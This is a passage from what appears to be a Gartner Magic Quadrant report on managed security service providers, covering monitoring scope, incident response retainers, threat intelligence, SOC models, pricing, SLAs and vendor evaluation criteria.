MSSPs also tend to support a broad scope of security and non-security-type data sources for security event monitoring. The event sources may include network devices (e.g., VPN devices, routers and switches), logs from user directory services (e.g., Active Directory), and host OS logs and application-specific logs. In the past couple of years, MSSPs have introduced services to manage and monitor both proprietary and commercial technologies designed to detect and protect against advanced threats. These services analyze payloads to detect malicious software and monitor activity and behavior of network traffic (e.g., network traffic analysis [NTA] tools) and endpoints (e.g., EDR agents). In addition to monitoring, many MSSPs have management services for those technologies (usually under their “MDR services”).

MSSPs may also provide cloud or SaaS-based services, including:

  • Vulnerability scanning
  • Network-based firewall/IDP
  • Web filtering/SWG
  • CASB
  • Email security
  • DDoS mitigation

Among organizations that have deployed a SIEM solution, Gartner sees increasing interest in services to monitor or run the SIEM. MSSPs continue to add offerings to support customer-deployed SIEM to accommodate these customers, either in a more customized model or until the customer can be transitioned off their SIEM tool and onto the MSSP’s delivery platform.

Incident Response Services

Most MSSPs offer incident response capabilities to assist customers with investigation and remediation activities. Gartner clients, in light of significant breaches in the news over the last 12 months, are interested in adding retainers for digital forensics and incident response (DFIR) services. MSS customers generally look to their provider for these services in many cases. These activities are available as proactive- and reactive-oriented services, delivered primarily remotely, but on-site as needed. These services are typically available on a consulting basis, and can be purchased as needed, or via a retainer for a set number of hours, with service-level commitments for response time for both remote and on-site support. Prospective customers should confirm with MSSP candidates how much response support is available within the context of the standard monitoring services, and when engaging the incident response retainer is required (for example, does the customer have to authorize use of the hours, or is it preagreed how the MSSP can use those hours?). SLAs are also commonly provided for both remote and on-site support. Customers should confirm the SLAs provided and penalties if SLAs are missed. If the MSSP offers packaged or prepaid retainer hours for incident response activities, then customers should confirm if those hours are available for other security services if they are not needed for incident response (e.g., through proactive services).

Threat Intelligence Capabilities and Services

Requirements for how MSSs leverage threat intelligence, and what premium threat intelligence services are available, appear on Gartner clients’ RFPs with increasing frequency. Buyers are specifically interested in how MSSPs are leveraging threat intelligence (e.g., to improve the prioritization and context around detected incidents). Additionally, rather than procuring advanced or customer-specific threat intelligences services from a third party, MSS buyers are looking first at the capabilities of the MSSP, through subscription-based services. Several MSSPs have dedicated security and threat-oriented research teams to improve their visibility of the threat landscape — that is, the identities, motives, targets, and tactics, techniques, and procedures of external attackers. These services feed their MSS capabilities, but also tend to be resold as advanced threat intelligence offerings, such as customer-specific dark web monitoring services. Those that do not have their own threat research groups often use a mix of one or more third-party threat intelligence providers along with open-source threat intelligence. MSSPs are increasing their support for common threat intelligence description and sharing formats, such as Structured Threat Information Expression (STIX) and Trusted Automated Exchange of Indicator Information (TAXII). In the last 12 months, a few MSSPs have also introduced threat intelligence platforms as part of their overall delivery platforms (see “Market Guide for Security Threat Intelligence Products and Services” ). As their use and the maturity of these tools increase, Gartner expects to see improved capabilities for customers to securely share and allow the MSS to consume provided threat intelligence. Buyers with requirements for this level of sharing should confirm with prospective MSSPs if they already have this capability, and if not, where it is in their roadmap.

MSS Delivery

Managed Service Portal Functionality

Buyers should apply significant focus to methods of communication with their provider, as this enables measurable recognition of value received. A key way to orchestrate efficient two-way recorded dialogue between outsourced security professionals and internal teams is through a fully featured portal. Any portal should provide multirole and granular access control, and dashboards with information preconfigured and adaptable to fit many different roles and functions within your organization, including those within senior risk management. Fully interactive incident ticketing with features for handover and resolution tracking provide buyers with a method not only to improve the service that the provider is operating through enrichment and semantic learning, but also to track and manage ROI in an area visible to both parties. Important features of provider portals also include the ability to search through security data and carry out threat hunting through fast and intuitive interfaces as well as seamless cross-service and function integrations with other security services and information, such as vulnerability scanning outputs and threat intelligence indicators.

Buyers should consider the quality and functionality of the provider portal to be a high-priority element in their decision to procure any MSS, as this becomes the outlet and store for all content that the service produces and is measured by.

Security Operations Centers

All MSSPs leverage SOCs as the physical locations to deliver 24/7 services. MSSPs use different patterns for service delivery, usually either from a SOC operating round-the-clock, using a follow-the-sun approach with operation during local business hours seven days per week, or for resiliency as needed, or a hybrid of these two models. Each has its strengths and weaknesses. For example, technically a SOC in one region can support a customer in another; however, there are potentially significant roadblocks in the form of language, time zones and regulations that need to be considered. On the other hand, better service may be achieved when the MSSP uses a follow-the-sun model which can alleviate SOC analyst quality issues that arise when analysts have to work nights and weekends (see “How to Plan, Design, Operate and Evolve a SOC” ). MSS buyers need to carefully evaluate the SOC locations and operating models used by MSSPs to ensure they will meet their requirements.

Threat Detection and Advanced Analytics Capabilities

Many MSSPs claim capabilities to assist their customers in addressing advanced attacks, in addition to their abilities to detect common, broad-based threats. These capabilities may be visible as discrete service offerings or options, or as features embedded in existing offerings. They may include, for example:

  • Correlation of events with threat intelligence that can provide attribution (e.g., to a broad-based malware family versus known hacking group)
  • Analysis of activity patterns (across an MSS customer base as well as within the customer environment) to identify outliers, exceptions or deviations from baselines in security events, network traffic, or the activity of users or entities on the network
  • Analysis of user behavior to identify anomalies from normal behavior across environments (on-premises, cloud) — this is an emerging area that is currently supported by very few MSSPs

The adoption of big data technologies like Hadoop, Elasticsearch and NoSQL is permeating MSS. This makes sense as MSSPs have historically had to deal with “big data problems” — a large volume, velocity and variety of log event and other data. These technologies are being used to help MSSPs better manage and analyze the large amounts and various types of data acquired from their customers, and to make it more accessible (e.g., via real-time search as opposed to scheduled search jobs) and for longer periods of time than what has been previously available. However, the time horizon to search over those logs continues to stay relatively stable, with 90 days of online data being the norm and data older than that being relegated to warm or offline storage. The adoption of big data technologies is also fueling a drive to improve threat detection capabilities through advanced analytics; however, it’s still early days.

As big data technologies are being adopted, advanced analytics are being used in back-end systems to complement traditional real-time security event correlation and monitoring capabilities. Batch-oriented analytics that can be run over much larger datasets covering weeks or months of data, commonly using machine-learning-based approaches, are being employed. Gartner recommends that customers ask for specific information and evidence where advanced analytics is being used as a means of differentiating and comparing service offerings across providers. Most MSSPs claim that the customer won’t be able to determine, based on the alerts they are notified with, whether the event was detected using standard methods, such as correlation or threat intelligence matches, or if it was via a more advanced method (e.g., anomalous activity detected using a supervised machine learning approach). Buyers should also ask about how a provider leverages advanced analytics methods. For example, is the capability through a commercially available technology that is managed by the provider, or has the provider actually invested in R&D to customize and tune a commercial (or proprietary) analytics technology?

Monitoring Beyond On-Premises Customer Environments

SaaS visibility is top of mind with Gartner clients interested in MSS, with IaaS second. Use of popular SaaS like Office 365, Salesforce, Box and Workday are driving the demand. MSSPs are slowly adding support, via partnerships, for CASBs to provide SaaS security monitoring, but few Gartner clients report interest in this approach. Most clients are expecting native API-based approaches to be used as part of the core security event monitoring capabilities. The approach is mixed across MSSPs. Some claim support for APIs, others rely on the use of a CASB solution and a few offer both, depending on the level of event monitoring required by the buyer.

Most MSSPs have focused on the monitoring of assets located in public cloud services, such as AWS and Azure, by leveraging a mix of external security controls deployed in the public cloud and native API-based security integrations (e.g., AWS CloudTrail). Support for Azure has increased over the past 12 months, but AWS is still the most supported environment. Few MSSPs have support for IaaS security products like cloud workload protection platforms (see “Market Guide for Cloud Workload Protection Platforms” ).

There is another dimension to cloud security, and that is security services delivered from the cloud (e.g., security as a service). Some MSSPs support established security-as-a-service technologies (e.g., SWGs and secure email gateways [SEGs]). For example, many of the pure-play providers with their own technology portfolios, and NSPs through partnerships with cloud-based SWG providers, offer management and monitoring services for those deployment modes.

Pricing Models

There are several pricing models used by MSSPs, leading to confusion among buyers as to which approach is most appropriate and making it difficult to compare pricing across competing providers. A majority of MSSPs offer a pricing model based on the type and size of the security technology to be monitored and/or managed for customer-owned security technologies, devices and other log sources. Log collection is typically priced by the number and types of sources, or by the number of events per time period (device count pricing includes implicit expectations of event volumes). There is often a clear distinction between technology that is monitored in real time and subject to alerting SLAs, and technology that is not — that is, where logs are collected and subject to reporting or querying, but not to real-time correlation and analyst review.

Alternative models are also being seen in the market. Gartner expects to see new pricing models introduced as a competitive advantage, and to reduce the complexity and friction with selling MSSs:

  • Data volume or velocity: Providers, especially those using a commercial SIEM solution as part of their delivery platform, are pricing MSSs based on the average volume of data collected over a time period (such as gigabytes per day) or the velocity of data sent to the MSS for analysis (usually measured as log events sent per second or daily). This model allows customers to pay based on the actual amount of data provided to the service provider for analysis, rather than the number or type of data sources. This is not a dominant model in the market. Issues with this model include a lack of control over the amount of data being generated (e.g., during a DDoS attack) and that not all data provides equal benefits, but customers pay the same rate for data collected and analyzed (e.g., web proxy versus DNS events).
  • Per log event source pricing: This pricing model is based on the total number of sources sending data to the MSSP. In this model, all data sources, regardless of how much log and event data they generate, are treated equally. This is sometimes provided as an enterprisewide license model too.
  • Per incident: In this approach, customers are charged based on the number of incidents that are detected and number of alerts notified.
  • Per user or asset: This approach is based on the number of users or assets inside an organization, and based on analytics activities (such as running specific algorithms against a volume of data).

Device management pricing is typically based on the number of configuration changes to be performed within a period of time. This model offers a fairly straightforward means for potential customers to determine the cost of a service and allows comparison across potential providers. A potential issue with this model is that, where customers have high-capacity event sources that are underutilized, they pay for the potential capacity, rather than actual usage of those devices.

Service-Level Agreements

Gartner clients need to be aware of the SLAs offered by MSSPs, as they are a continuing source of misunderstanding by buyers and differences exist across providers. SLAs are commonly offered for monitoring and managed services. Usually, a vendor segregates the SLAs into three to five response levels measured against a specific severity (e.g., urgent, high, medium, low). In many cases, the monitoring and response severities are aligned to managed device SLAs too.

MSS buyers need to confirm the tiers and associated SLAs for the services they plan to buy. Many MSSPs offer various tiers of service at different price points with varying SLAs (e.g., more expensive service will have shorter response times). MSS buyers should confirm the options available with the providers and evaluate which tier they are being quoted, and whether fewer tiers of service might be acceptable given the trade-offs between risks and costs. SLA rightsizing is a critical part of getting the most value from an MSSP. It is also important to confirm how the SLA is measured and calculated. For example, does the clock on an SLA start when the incident is detected by an automated system, when the incident is picked up from a queue of unassigned events by an analyst, or from the time an analyst has established that there is an incident worth notifying the customer about?

Most MSSPs offer standard SLAs; however, some negotiate SLAs on a customer-by-customer basis, while a few others still negotiate custom SLAs for each customer. MSS buyers consuming these services as part of broader IT outsourcing contracts need to be doubly cautious about defining the right SLAs. Gartner has observed several risk areas in such engagements — from providers carrying forward generic SLAs to weak service definitions to poor reimbursements and remediation. Finally, MSS buyers need to confirm whether a provider offers any reimbursements for missed SLAs. Some MSSPs offer credits against future payments for missed SLAs, but this is not common practice across the industry. These can scale to become more severe for multiple occasions of SLA noncompliance. However, there is usually a limit for how many credits can be provided, such as not exceeding a certain percentage of the total monthly or annual charges. Also, sometimes there are earn-back provisions that forgive remedies based on improved performance by the MSSP. It is important to note that, in most cases, it is the customer’s responsibility to notify the service provider of any proposed SLA violation within a set time period of the date on which the proposed violation occurred. At a minimum, the provider should have capabilities for performing a root cause analysis and offering root cause elimination as part of its SLA conformance.

MSSP Market Activity in 2017

The global MSSP market in 2017 was stable. CSC and HPE Enterprise Services formally merged as DXC Technology in April 2017.

MSSPs Not Evaluated in the Magic Quadrant

Not included in this Magic Quadrant analysis are smaller, region-, country-level and local-area MSS providers, which can include small pure plays and larger providers that do not have enough MSS business in multiple regions to meet the inclusion criteria (although they may be a good choice for buyers that don’t require a global footprint and would prefer a more “local” provider). Also excluded from this analysis are service providers that provide MSSs only for their own technologies, and that do not deliver services for third-party commercial technology (for example, MDR service providers). Providers with security services that are sold and delivered primarily with infrastructure outsourcing, staff augmentation or account-dedicated resources are also not included in this Magic Quadrant.

Evidence

  • Gartner customer inquiries and information sharing related to MSSPs
  • Analyst interactions with Gartner customers via inquiries and meetings
  • Survey of MSSPs
  • Survey of MSS reference customers
  • Gartner Peer Insights

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.